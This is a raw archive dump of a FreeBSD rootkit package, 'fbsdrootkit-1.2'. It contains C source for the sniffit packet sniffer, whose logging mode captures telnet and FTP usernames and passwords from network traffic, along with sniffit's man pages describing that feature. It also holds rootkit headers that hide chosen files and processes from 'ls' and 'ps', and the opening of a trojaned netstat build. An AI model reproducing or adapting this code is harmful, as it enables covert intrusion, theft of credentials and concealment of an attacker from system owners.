if((dummy_pointer=add_dynam(filename, TCP, 0,ntohl(tcphead.seq_nr),info.DATA_len))==NULL) return; } if(finish==TCP_FINISH) /* let's reset the connection */ {delete_dynam(filename, TCP, 0);} /*** return before using any search or pointer!!!!!!!! ***/ /* Connections with FIN have deleted entries! */ dummy=ntohs(tcphead.offset_flag); if(LOGLEVEL<10) /* Raw logging */ { if(dummy&SYN) print_conn(filename,"Connection initiated. (SYN)"); if(dummy&FIN) print_conn(filename,"Connection ending. (FIN)"); if(dummy&RST) print_conn(filename,"Connection reset. (RST)"); return; } if(LOGLEVEL<30) /* more sophisticated */ { const u_char *data = sp+PROTO_HEAD+info.IP_len+info.TCP_len; if(search_dynam(filename2, TCP)==NULL) { if(dummy&SYN) print_conn(filename,"Connection initiated."); if(dummy&FIN) print_conn(filename2,"Connection closed."); } if(dummy&FIN) return; /* needed, cauz entry don't exist */ if(LOGLEVEL>=12) /* loglevel 12 */ { dummy_pointer=search_dynam(filename, TCP); /* don't forget to check dummy_pointer!!! */ if( (ntohs(tcphead.source) == 23) && (dummy_pointer!=NULL))/* from telnet */ { sbuf_update(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len); /* detect login */ strlower(dummy_pointer->scroll_buf); if((dummy_pointer->log!=99)&&(strstr(dummy_pointer->scroll_buf,"login")!=NULL)) { dummy_pointer->log=99; dummy_pointer=search_dynam(filename2, TCP); if(dummy_pointer!=NULL) {dummy_pointer->log=1; dummy_pointer->bytes=0; dummy_pointer->buffer=malloc(LOG_PASS_BUF); if(dummy_pointer->buffer==NULL) exit(1); dummy_pointer->buffer[0]=0; } else { print_conn(filename2,"Password missed due to overload."); }; #ifdef DEBUG_ONSCREEN printf("Login detected, data initialised.\n"); #endif } } if( (ntohs(tcphead.destination) == 23) && (dummy_pointer!=NULL))/* TO telnet */ { if(dummy_pointer->log==1) /* log login */ { record_buf(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len,0); if(dummy_pointer->log==2) /* login recorded */ { print_login(filename,dummy_pointer->buffer); dummy_pointer->log=3; dummy_pointer->bytes=0; dummy_pointer->buffer[0]=0; } } else { if(dummy_pointer->log==3) /* log pwd */ { record_buf(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len,0); if(dummy_pointer->log==4) /* passwd recorded */ { print_pwd(filename,dummy_pointer->buffer); dummy_pointer->log=0; dummy_pointer->bytes=0; dummy_pointer->buffer[0]=0; } } } } } if( (ntohs(tcphead.destination) == 21) && (dummy_pointer!=NULL))/* to FTP */ { sbuf_update(dummy_pointer,ntohl(tcphead.seq_nr),data,info.DATA_len); /* detect USER en PASS */ if((help=strstr(dummy_pointer->scroll_buf,"USER"))!=NULL) { help+=strlen("USER "); for(i=0;iscroll_buf[i]==FTP_ENTER) dummy_pointer->scroll_buf[i]=0; print_ftp_user(filename,help); for(i=0;iscroll_buf[i]=' '; } if((help=strstr(dummy_pointer->scroll_buf,"PASS"))!=NULL) { help+=strlen("PASS "); for(i=0;iscroll_buf[i]==FTP_ENTER) dummy_pointer->scroll_buf[i]=0; print_ftp_pass(filename,help); for(i=0;iscroll_buf[i]=' '; } } if( (dummy_pointer=search_dynam(filename, TCP)) !=NULL) { if(ntohl(tcphead.seq_nr)==dummy_pointer->exp_seq) dummy_pointer->exp_seq+=info.DATA_len; /* if we miss a packet... no probs seq nr's get updated */ /* cauz' we can't rely on ACK's from other side */ /* it's pretty good this way */ if(ntohl(tcphead.seq_nr)>dummy_pointer->exp_seq) dummy_pointer->exp_seq=ntohl(tcphead.seq_nr)+info.DATA_len; } return; } return; /* DON'T FORGET THEM!!!! */ } if(finish<20) /* ICMP packet */ { memcpy(&icmphead,header,sizeof(struct ICMP_header)); memcpy(&iphead_icmp, (sp+PROTO_HEAD+info.IP_len+ICMP_HEADLENGTH+4), sizeof(struct IP_header)); printf("ICMP message id: %s\n",filename); printf(" ICMP type: "); switch(icmphead.type) { case 0: printf("%s\n",ICMP_TYPE_0); break; case 3: printf("%s\n",ICMP_TYPE_3); printf(" Error: %s\n", ICMP_type_3_code[icmphead.code]); print_iphead(&iphead_icmp,1); break; case 4: printf("%s\n",ICMP_TYPE_4); print_iphead(&iphead_icmp,1); break; case 5: printf("%s\n",ICMP_TYPE_5); printf(" Error: %s\n", ICMP_type_5_code[icmphead.code]); print_iphead(&iphead_icmp,1); break; case 8: printf("%s\n",ICMP_TYPE_8); break; case 11:printf("%s\n",ICMP_TYPE_11); printf(" Error: %s\n", ICMP_type_11_code[icmphead.code]); print_iphead(&iphead_icmp,1); break; case 12:printf("%s\n",ICMP_TYPE_12); print_iphead(&iphead_icmp,1); break; case 13:printf("%s\n",ICMP_TYPE_13); break; case 14: printf("%s\n",ICMP_TYPE_14); break; case 15: printf("%s\n",ICMP_TYPE_15); break; case 16: printf("%s\n",ICMP_TYPE_16); break; case 17: printf("%s\n",ICMP_TYPE_17); break; case 18: printf("%s\n",ICMP_TYPE_18); break; default: printf("Unknown ICMP type!\n");break; } printf("\n"); return; } if(finish<30) /* nothing yet */ { memcpy(&udphead,header,sizeof(struct UDP_header)); switch(DUMPMODE & 223) { case 0: break; case 1: /* DUMP mode */ case 2: case 3: printf("UDP Packet ID (from_IP.port-to_IP.port): %s\n",filename); total_length=info.IP_len+info.UDP_len+info.DATA_len; n = 0; for(i=0;i 75) n=0, printf("\n"); if(DUMPMODE & 1) n += printf(" %02X",c); if(DUMPMODE & 2) n += printf(" %c",isprint(c)?c:'.'); } printf("\n\n"); break; default: printf("\nImpossible error! Sniffer Hartattack!\n"); exit(0); } return; } } #ifdef INCLUDE_INTERFACE /* Interactive packethandling */ int check_mask (const struct packetheader *p_header, const unsigned char *sp, char *conn_name, struct unwrap *info) /* return -1 : packet not for us */ /* else finish value */ { u_char *so,*dest; struct IP_header iphead; struct TCP_header tcphead; int proto; proto=unwrap_packet(sp, info); (*IP_nr_of_packets)++; if(proto==ICMP) {(*ICMP_nr_of_packets)++; return DONT_EXAMINE;} if(proto==UDP) {(*UDP_nr_of_packets)++; (*UDP_bytes_in_packets)+=(info->UDP_len+info->DATA_len+info->IP_len); return DONT_EXAMINE;} if(proto!=TCP) return DONT_EXAMINE; /* Packet info */ (*TCP_nr_of_packets)++; (*TCP_bytes_in_packets)+=(info->TCP_len+info->DATA_len+info->IP_len); /* Not a TCP packet */ memcpy(&iphead,(sp+PROTO_HEAD),sizeof(struct IP_header)); memcpy(&tcphead,(sp+PROTO_HEAD+info->IP_len),sizeof(struct TCP_header)); if(mask->source_ip!=0 && iphead.source!=mask->source_ip) return DONT_EXAMINE; if(mask->destination_ip!=0 && iphead.destination!=mask->destination_ip) return DONT_EXAMINE; if(mask->destination_port && ntohs(tcphead.destination) != mask->destination_port) return DONT_EXAMINE; if(mask->source_port && ntohs(tcphead.source) != mask->source_port) return DONT_EXAMINE; /* inet_ntoa gave wrong output sometimes */ so=(u_char *)&(iphead.source); dest=(u_char *)&(iphead.destination); sprintf(conn_name,"from %u.%u.%u.%u %u to %u.%u.%u.%u %u", so[0],so[1],so[2],so[3], ntohs(tcphead.source), dest[0],dest[1],dest[2],dest[3], ntohs(tcphead.destination)); if ((ntohs(tcphead.offset_flag) & FIN) != 0)/* check for reset conn. */ return TCP_FINISH; /* packet is a FIN */ if (info->DATA_len == 0) return DONT_EXAMINE; /* packet not for us */ return TCP_EXAMINE; /* interprete packet */ } pcap_handler interactive_packethandler( char *dummy, const struct packetheader *p_header, const unsigned char *sp) { char conn_name[CONN_NAMELEN]; int finish; /* look out it's signed */ struct unwrap info; finish=check_mask(p_header,sp,conn_name,&info); if(finish==DONT_EXAMINE) return; /* Packet is not for us */ if(finish!=TCP_FINISH) /* finish: already logged, or to short to add */ add_itemlist(running_connections,conn_name); if(strcmp(log_conn->log_enter, conn_name)==0) { const u_char *data=sp+PROTO_HEAD+info.IP_len+info.TCP_len; if(*DATAlength+info.DATA_len < LENGTH_OF_INTERPROC_DATA) { memcpy((connection_data+*DATAlength),data,info.DATA_len); *DATAlength+=info.DATA_len; } } if(finish==TCP_FINISH) del_itemlist(running_connections,conn_name); kill(getppid(),SIGUSR1); } #endif static u_long getaddrbyname(char *name) { struct hostent *he; if(isdigit(*name)) return inet_addr(name); if(!(he = gethostbyname(name))) { #ifdef DEBUG debug_msg("GetAddr: Couldn't get host."); #endif /* perror(name); */ } return he ? *(long*)*he->h_addr_list : 0; } int main(int argc,char *argv[]) { char *dev, forced_dev[20], buffer[SNAPLEN]; int c; u_long ipaddr, memsize; int flag=0, doboth=0, FORCE_DEV=0; extern char *optarg; signal (SIGINT, my_exit); /* controled CTRL-C exit */ SNIFLEN=300; /* Set defaults */ DEST_PORT=0; /* Dest Port */ SNIFMODE=DUMPMODE=PROTOCOLS=ASC=WILDCARD=CFG_FILE=NO_CHKSUM=0; LOGLEVEL=0; Logfile[0]=0; IP=logging_device=NULL; #ifdef DEBUG if((debug_dev=fopen(DEBUG_DEVICE,"a"))<0) {printf("Couldn't open DEBUG device!\n");exit(0);} else { fprintf(debug_dev,"\n\nDEVICE OPENED FOR SNIFFIT DEBUGGING\n\n"); exit_func(close_debug_device); } #endif #ifdef INCLUDE_INTERFACE while((c=getopt(argc,argv,"D:A:P:idp:l:xabt:s:F:c:nvL:"))!=-1) { #else while((c=getopt(argc,argv,"A:P:dp:l:xabt:s:F:c:nvL:"))!=-1) { #endif /* Argument treating */ switch(c) { case 'v': printf("Sniffit Version %s - Copyright 1996 Brecht Claerhout\n",VERSION); #ifdef __DATE__ printf("Binary build %s %s\n",__DATE__,__TIME__); #endif exit(0); break; case 'd': DUMPMODE|=1; break; case 'a': DUMPMODE|=2; break; case 'x': DUMPMODE|=32; break; case 'p': DEST_PORT=atoi(optarg); break; case 'l': SNIFLEN=atol(optarg); break; case 'L': LOGLEVEL=atoi(optarg); break; case 'b': doboth=1; break; case 'A': ASC=1; non_printable=*optarg; break; case 'D': logging_device=optarg; break; case 'P': optarg=strlower(optarg); if(strstr(optarg,"tcp")) PROTOCOLS |= F_TCP; if(strstr(optarg,"icmp")) PROTOCOLS |= F_ICMP; if(strstr(optarg,"udp")) PROTOCOLS |= F_UDP; if(strstr(optarg,"ip")) PROTOCOLS |= F_IP; break; case 's': flag++; SNIFMODE=SOURCE; IP=optarg; break; case 't': flag++; SNIFMODE=DEST; IP=optarg; break; case 'i': flag++; SNIFMODE=INTERACTIVE; break; case 'n': NO_CHKSUM=1; break; case 'F': strcpy(forced_dev,optarg); FORCE_DEV=1; break; case 'c': flag++; read_cfg_file(optarg); #ifdef DEBUG_ONSCREEN printf("FINISHED INTERPRETING\n"); printf("sf:%d st:%d df:%d dt:%d\n",select_from_length,select_to_length, deselect_from_length, deselect_to_length); #endif CFG_FILE=1; break; default : break; } } if (getuid()!=0) printf("You should be root to run this program!\n"), exit(1); if(flag!=1) quit(argv[0]); if( (LOGLEVEL!=0) && (CFG_FILE==0) ) quit(argv[0]); if(LOGLEVEL != 0) open_logfile(); if(PROTOCOLS==0) PROTOCOLS |= F_TCP; if(doboth) SNIFMODE=BOTH; if((SNIFMODE!=INTERACTIVE)&&(CFG_FILE==0)) { /* if(index(IP,'x')) For SunOS */ if(strchr(IP,'x')) {printf("Wildcard detected, IP nr. not checked...\n"); WILDCARD=1; /* strcpy(index(IP,'x'),"\0"); */ strcpy(strchr(IP,'x'),"\0"); } else { ipaddr = getaddrbyname(IP); if(ipaddr==0) printf("Non existing host!\n"), exit(1); } } reset_all(); /* just to be sure */ if( (dev=pcap_lookupdev(NULL))==NULL ) { printf("No network devices found.... Sniffit giving up.\n"); exit(1); } if(FORCE_DEV!=0) { strcpy(dev,forced_dev); printf("Forcing device to %s (user requested)...\n",dev); printf("Make sure you have read the docs carefully.\n"); PROTO_HEAD=FORCED_HEAD_LENGTH; } if(strstr(dev,ETH_DEV)) /* For expansion */ {PROTO_HEAD=ETHERHEAD; printf("Supported ethernet device found. (%s)\n",dev); } if(strstr(dev,PPP_DEV)) {PROTO_HEAD=PPPHEAD; printf("Supported PPP device found. (%s)\n",dev); } if((dev_desc=pcap_open_live(dev,SNAPLEN,1,MSDELAY,NULL))==NULL) {printf("Couldn't open device.\n"); exit(0);} #ifdef INCLUDE_INTERFACE if (SNIFMODE==INTERACTIVE) { memsize=sizeof(int)+sizeof(int)+LENGTH_OF_INTERPROC_DATA+ sizeof(int)+sizeof(struct snif_mask)+ sizeof(struct shared_logged_conn)+ (CONNECTION_CAPACITY*sizeof(struct shared_conn_data))+ sizeof(int)+ sizeof(long)+sizeof(int)+sizeof(int)+sizeof(long)+ sizeof(int); memory_id = shmget(0,memsize,0700); if(memory_id<0) {perror("Interactive Sniffer Hartattack (No Shared mem avail!)"); exit(0);} exit_func(mem_exit); if((SHARED=shmat(memory_id,0,SHM_RND))==NULL) {perror("Interactive Sniffer Hartattack (Wow something is wrong here)"); exit(0);}; printf("Entering Shared memory at %p\n",SHARED); printf("Shared %d\n",memsize); timing = SHARED; /* set all pointers */ DATAlength = timing + sizeof(int); connection_data = DATAlength + sizeof(int); LISTlength = connection_data + LENGTH_OF_INTERPROC_DATA; mask = LISTlength + sizeof(int); logged_connections = mask + sizeof(struct snif_mask); log_conn=(struct shared_logged_conn *)logged_connections; running_connections = logged_connections + sizeof(struct shared_logged_conn); TCP_nr_of_packets= running_connections+(sizeof(struct shared_conn_data)*CONNECTION_CAPACITY); TCP_bytes_in_packets= TCP_nr_of_packets+sizeof(int); ICMP_nr_of_packets= TCP_bytes_in_packets+sizeof(long); UDP_nr_of_packets= ICMP_nr_of_packets+sizeof(int); UDP_bytes_in_packets= UDP_nr_of_packets+sizeof(int); IP_nr_of_packets= UDP_bytes_in_packets+sizeof(long); clear_shared_mem(0); if ((Pid=fork())<0) {perror("Interactive Sniffer Hartattack (Couldn't fork)"); exit(0);}; if(Pid==0) { sleep(4); while(1) if(pcap_dispatch(dev_desc,PACKETS, interactive_packethandler,NULL)<0) printf("Capturing Packets Failed\n"), exit(0); } else { exit_func(child_exit); signal(SIGCHLD,SIG_IGN); if(logging_device != NULL) { if(stat(logging_device,&log_dev_stat)<0) perror("\'-D\' option error"),exit(0); if((log_dev_stream=fopen(logging_device,"a")) == NULL) printf("Couldn't open device for logging output\n"),exit(0); } run_interface(); } } else { #endif if(CFG_FILE==0) printf("Sniffit.%s is up and running.... (%s)\n\n",VERSION,IP); else printf("Sniffit.%s is up and running.... (Config File Used)\n\n",VERSION); while(1) if(pcap_dispatch(dev_desc,PACKETS,packethandler,(u_char *)&ipaddr)<0) printf("Capturing Packets Failed\n"), exit(0); #ifdef INCLUDE_INTERFACE } #endif /* Close device? Nahhh.... fuck it! we don't get here anyway!*/ } fbsdrootkit-1.2/sniffit.0.3.3/sniffit.5100600 764 764 6105 6226213211 14762 0ustar dfdf.\" sniffit config file man page - Brecht Claerhout .\" .TH SNIFFIT 5 .SH NAME sniffit \- configuration file for sniffit (name arbirtary) .SH DESCRIPTION This page describes the format for the config file for .B sniffit (see .BR sniffit (8) ). This file allows you to specify in great detail witch packets should be processed by .B sniffit. This file also controls (or will control) some functions for the continuous logging ('-L' option). .LP A .B sniffit config file might look like: .IP .nf # Sniffit V.0.3.1 Sample Config file -- Brecht Claerhout logfile /var/adm/sniffit.today.log # First select all packets! select both mhosts 1 select both mhosts 2 # Now deselect all packets from/to those damn 'surfers' deselect both port 80 deselect both port 8001 .fi .LP This file will tell .B sniffit to process all packets on the subnet except those FROM/TO ports 80 and 8001 (thus we don't want logs of those mass WWW connections witch turn our logs unreadable). .SH "GLOBAL FORMAT" The file consists of lines, lines are formed by fields, fields are separated with SPACES (NO TABS). Unix comment lines (starting with '#' are allowed). So this gives us: .IP .SH "FIELD FORMAT" .IP "" .B select - .B Sniffit will look for packets that match the following description (other fields) .IP .B deselect - .B Sniffit will ignore packets that match the description .IP .B logfile - change the logfile name to instead of the default 'sniffit.log' .IP "" .B from - Packets FROM the host matching the following desc. are considered. .IP .B to - similar, Packets TO the.... .IP .B both - similar, Packets FROM or TO the.... .IP .B "a filename" - as an argument of 'logfile' in .IP "" .B host - The (de)selection criteria involves a hostname. .IP .B port - similar, ... a portnumber .IP .B mhosts - The (de)selection criteria involves multiple-hosts, like with the wildcars in 0.3.0, but without the 'x' .IP "" Either a hostname, a portnumber or a numbet-dot partial notatiion indicating multiple hosts depending on .IP "" A portnumber, if was 'host' or 'mhosts' (optional, if not filled in, all ports are going to be (de)selected) .SH "FILE INTERPRETING" The config file is interpreted SEQUENTIAL, so watch it, don't mix lines in a file. Example: .IP .nf select both mhosts 100.100.12. deselect both port 80 select both host 100.100.12.2 This file will get you the packets: a) Send by hosts '100.100.12.*' b) EXCEPT the WWW packets c) BUT showing the WWW packets concerning 100.100.12.2 .fi .IP .nf select both mhosts 100.100.12. select both host 100.100.12.2 deselect both port 80 Will give you the packets (probably unwanted result): a) Send by hosts '100.100.12.*' b) Send from/to 100.100.12.2 (useless line) c) deselecting all WWW packets on the subnet .ni .SH AUTHOR Brecht Claerhout .SH "SEE ALSO" .BR sniffit (8) fbsdrootkit-1.2/sniffit.0.3.3/sniffit.8100600 764 764 20574 6226213211 15013 0ustar dfdf.\" Sniffit man page file - Brecht Claerhout .\" Process this file with .\" groff -man -Tascii foo.1 .\" .TH SNIFFIT 8 .SH NAME sniffit \- packet sniffer and monitoring tool .SH SYNOPSIS .B sniffit [-xdabvn] [-P .I proto .B ] [-A .I char .B ] [-p .I port .B ] [-l .I sniflen .B ] [-L .I loglevel .B ] [-F .I snifdevice .B ] [-D .I tty .B ] [(-t .I Target-IP .B | -s .I Source-IP .B ) | -i | -c .I config-file .B ] .SH DESCRIPTION .B sniffit is a packet sniffer for TCP/UDP/ICMP packets. .B sniffit is able to give you very detailed technical info on these packets (SEQ, ACK, TTL, Window, ...) but also packet contence in different formats (hex or plain text, ...). .LP .B sniffit can by default handle ethernet and PPP devices, but can easily be forced into using other devices (read the .B README.* and .B config.h files on this subject!) .LP The sniffer can easily be configured in order to 'filter' the incomming packets (to make the sniffing results easier to study). The config file (see .BR sniffit (5) ) allows you to be verry specific on the packets to be processed. .LP .B sniffit also has an interactive mode for active monitoring, and can also be used for continuous monitoring on different levels. .SH NOTE This man page is supposed to be a reference manual. So please read .B README.* first, and use this only for better understanding or for a quick check on the use of .B sniffit .SH OPTIONS .IP -v Shows the version of .B sniffit you are running and exits .I "(overrides all)" .IP "-t Target-IP" Only process packets TO Target-IP. If Target-IP is in dot-nr notation, 'x' is allowed as wildcard. (e.g. '-t 157.193.x', '-t x', ...) .I "(NOT compatible with: '-s' '-i' '-c' '-v' '-L')" .IP "-s Source-IP" Similar to '-t', only process packets FROM Source-IP. .I "(NOT compatible with: '-t' '-i' '-c' '-v' '-L')" .IP -b 'both' mode, together with '-s' or '-t', only process FROM/TO the IP specified by '-s' or '-t' .I "(NOT compatible with: '-t' '-i' '-c' '-v' '-L')" .IP "-c config-file" Use .I config-file for the packet filtering. This allows you to be very specific on the packets to be processed (see .BR sniffit (5) for details on the format). .I "(NOT compatible with: '-t' '-s' '-i' '-v' '-L')" .IP -i Launch the ncurses interface for active monitoring ('interactive mode'). (NOT available if you compiled without INTERACTIVE support see .B config.h and .B README.* ) (one of the options '-t' '-s' '-i' '-c' is required) .I "(NOT compatible with: '-t' '-s' '-c' '-v' '-L')" .IP -n Turn of IP checksum checking. This can show you bogus packets. (mind you ARP, RARP, other non-IP packets will show up bogus too) .I "(compatible with ALL options)" .IP -x Prints extended info on TCP packets to stdout (SEQ, ACK, Flags, etc...) Interesting when tracing spoofs, packet loss and other real net debugging/checking tasks. (if you want to log this, pipe stdout to a file) .I "(NOT compatible with: '-i' '-v')" .IP -d 'dump mode', shows the packets on the screen (stdout) instead of logging into files (default). Data is printed in bytes (hex). .I "(NOT compatible with: '-i' '-v' '-L')" .IP -a 'dump mode', same of '-d' but outputs ASCII. Non printable chars are replaced by '.'. ('-d' and '-a' mix without any problem) .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-P proto" Specify the protocols that should be processed (default TCP). Possible options currently are: IP, TCP, ICMP, UDP. They can be combined. IP, ICMP, UDP info is dumped to stdout. IP gives ADDITIONAL info on the IPwrapping around other packets, it is not needed to specify IP for TCP packet logging. IP, UDP, ICMP packets are not filtered. .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-A char" When in 'normal mode' (not '-d','-a','-i','-L'), all non-printable chars will be replaced by .I char .I "(NOT compatible with: '-a' '-d' '-i' '-v' '-L')" .IP "-p port" Only checks packets going TO (!!) port .I port , 0 means all ports, default is 0 (all). .I "(NOT compatible with: '-c' '-i' '-v' '-L')" .IP "-l sniflen" Ammount of data to log (default 300 bytes) in 'normal mode'. The first .B sniflen bytes of every connection are logged. Length 0 logs means everything. (look out with diskspace!) .I "(NOT compatible with: '-i' '-v' '-L')" .IP "-F snifdevice" Force sniffit to use a certain network device. .I snifdevice can be found with .I ifconfig (see .BR ifconfig (8) ). .B sniffit supports ethernet and PPP by default. Read .B README.* for info on forcing the use of other devices. .I "(compatible with ALL options)" .IP "-D tty" All logging output will be send to that device. .I "(ONLY works with '-i')" .IP "-L loglevel" Use .B sniffit as a monitoring tool and enable loglevel .I loglevel The File for logging can be specified in the config file (see .BR sniffit (5) ) but is .B sniffit.log by default. .I "(ONLY works with '-c')" .SH "NORMAL MODE" A bunch of .I sniflen initial bytes (default 300) of each connection is logged into a file .B x.x.x.x.p-y.y.y.y.o where 'x.x.x.x' is the sending host (port 'p') and 'y.y.y.y' the receiving host (port 'o'). .SH "DUMP MODE ('-d' and/or '-a')" Output is dumped to stdout, the packet contence is shown in it's unwrapped form (the complete IP packet). .SH "INTERACTIVE MODE ('-i')" Keys available in interactive mode: .IP "'UP or 'k'" self explanatory .IP "DOWN or j'" self explanatory .IP "F1 or '1'" Enter a host (enter 'all' for no mask) for packet filtering (host that sends the packets) .IP "F2 or '2'" Enter a host (enter 'all' for no mask) for packet filtering. (host that receives the packets) .IP "F3 or '3'" Enter a port (enter '0' for no mask) for packet filtering. (host that sends the packets) .IP "F4 or '4'" Enter a port (enter '0' for no mask) for packet filtering. (host that receives the packets) .IP "F5 or '5'" Start a program 'sniffit_key5' with arguments .I " " If the program doesn't exist, nothing is done. Sniffit should be in the same path as sniffit was STARTED FROM (not necessarely the path sniffit is stored in) This function is usefull for interactive connection killing or extra monitoring. A little shell script can always transform the arguments given and pass them on to other programs. .IP "F6 or '6'" Same as F5 or '5', but with program 'sniffit_key6' .IP "F7 or '7'" Same as F5 or '5', but with program 'sniffit_key7' .IP "F8 or '8'" Same as F5 or '5', but with program 'sniffit_key8' .IP "ENTER" a window will pop up and log the connection, or the connection output will be send at a chosen device if you used the '-D' option. .IP "'q'" When in logging mode, stop logging. Otherwise, quit. .IP "'n'" Toggle netstatistics. These are sampled at 3 secs, look in the config.h file to change this. .SH "LOGGING MODE ('-L')" Output is saved to .B sniffit.log ,unless you have specified some other name in the config file (see .BR sniffit (5) ). .LP .IP "Loglevel 1 (Raw level)" Log all SYN, FIN, RST packets. This will give you an overview of all network (TCP) trafic in a 'RAW' way (a connection starting could gives you at least 2 SYN packets, etc...). .IP "Loglevel 10 (Normal level)" Same as Raw level 1, but a bit more intelligent. Unless packets are transmitted multiple times because of packet loss, you will only get 1 notice of a connection starting or ending. (the packet id will give you the host that initiated the connection first) .IP "Loglevel 12 (Normal level)" This option will spy on trafic concerning ports 21 and 23 on the subnet. Yes indeed, .B ftp (see .BR ftp (1) ) and .B telnet (see .BR telnet (1) ). Sniffit will try to catch login and passwords for these applications. .IP .B ftp - Easy catching. Even multiple tries are registered. .IP .B telnet - A bit harder. We only try to catch the first attempt, so if someone fails the first login, you will miss his password. A '~' in the login and passwords fields can be a nonprintable character (if in the beginning of a field, probably due to an early start of registration) or a '~'. Interested in some tricks that made this work? Have a look at in function 'packethandler' in the sniffit.*.c file) .SH "IP ICMP UDP LOGGING" Information on these packets is dumped to stdout. Packet origin/destination can't be filtered (otherwise put: filtering options only refer to TCP packets). The contence of UDP packets is only shown when enabling '-a' or '-d'. .SH AUTHOR Brecht Claerhout .SH "SEE ALSO" .BR sniffit (5) fbsdrootkit-1.2/rootkitls.h100600 764 0 2151 6273471757 13670 0ustar dfroot#define STR_SIZE 128 #define SHOWFLAG /* Able to list files with 'ls -/' command */ struct h_st { struct h_st *next; char filename[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; FILE *fp_hack; int showall=0; inline file_block_list() { char LSCONF[10]; LSCONF[0]=ROOTKIT_HIDE_FILES[0]; LSCONF[1]=ROOTKIT_HIDE_FILES[1]; LSCONF[2]=ROOTKIT_HIDE_FILES[2]; LSCONF[3]=ROOTKIT_HIDE_FILES[3]; LSCONF[4]=ROOTKIT_HIDE_FILES[4]; LSCONF[5]=ROOTKIT_HIDE_FILES[5]; LSCONF[6]=ROOTKIT_HIDE_FILES[6]; LSCONF[7]=ROOTKIT_HIDE_FILES[7]; LSCONF[8]=ROOTKIT_HIDE_FILES[8]; LSCONF[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen(LSCONF, "r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strcpy(h_tmp->filename, tmp_str); h_tmp->filename[strlen(h_tmp->filename)-1]='\0'; h_tmp=h_tmp->next; } } h_tmp->next=NULL; } inline int check_file(char *fpath) { for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) if(strstr(fpath, h_tmp->filename)) return(1); return(0); } fbsdrootkit-1.2/rootkitps.h100664 764 0 3677 6257600736 13715 0ustar dfroot#define STR_SIZE 128 #define SEP_CHAR " \n" #define SHOWFLAG /* Able to list processes with 'ps -/' command */ #define BY_USER 0 #define BY_TTY 1 #define BY_NAME 2 struct h_st { struct h_st *next; int hack_type; char hack_cmd[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; char *strp; FILE *fp_hack; int show_all=0; inline process_block_list() { char PSCONF[10]; PSCONF[0]=ROOTKIT_HIDE_PROCESSES[0]; PSCONF[1]=ROOTKIT_HIDE_PROCESSES[1]; PSCONF[2]=ROOTKIT_HIDE_PROCESSES[2]; PSCONF[3]=ROOTKIT_HIDE_PROCESSES[3]; PSCONF[4]=ROOTKIT_HIDE_PROCESSES[4]; PSCONF[5]=ROOTKIT_HIDE_PROCESSES[5]; PSCONF[6]=ROOTKIT_HIDE_PROCESSES[6]; PSCONF[7]=ROOTKIT_HIDE_PROCESSES[7]; PSCONF[8]=ROOTKIT_HIDE_PROCESSES[8]; PSCONF[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen(PSCONF,"r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strp=(char *)strtok(tmp_str, SEP_CHAR); h_tmp->hack_type=atoi(strp); strp=(char *)strtok('\0', SEP_CHAR); strcpy(h_tmp->hack_cmd, strp); h_tmp=h_tmp->next; } } h_tmp->next=NULL; } inline int check_process(struct kinfo_proc *kip) { int block=0; dev_t dev; char *ttname; for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) { switch(h_tmp->hack_type) { case BY_USER: #ifndef NEWVM if(kip->kp_proc.p_uid==atoi(h_tmp->hack_cmd)) #else if(kip->kp_eproc.e_ucred.cr_uid==atoi(h_tmp->hack_cmd)) #endif block=1; break; case BY_TTY: dev=kip->kp_eproc.e_tdev; if(dev==NODEV||!(ttname=devname(dev,S_IFCHR))) break; else { if(!strncmp(ttname,"tty",3)||!strncmp(ttname,"cua",3)) ttname+=3; if(!strcmp(ttname,h_tmp->hack_cmd)) block=1; } break; case BY_NAME: if(strstr(kip->kp_proc.p_comm,h_tmp->hack_cmd)) block=1; break; } } return(block); } fbsdrootkit-1.2/netstat/ 40700 764 0 0 6257642722 13043 5ustar dfrootfbsdrootkit-1.2/netstat/Makefile100600 764 0 403 6257642727 14564 0ustar dfroot# @(#)Makefile 8.1 (Berkeley) 6/12/93 PROG= netstat SRCS= if.c inet.c iso.c main.c mbuf.c mroute.c ns.c route.c \ tp_astring.c unix.c CFLAGS+=-I/sys .PATH: ${.CURDIR}/../netiso BINGRP= kmem BINMODE=2555 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/netstat/if.c100600 764 0 25044 6163407272 13724 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 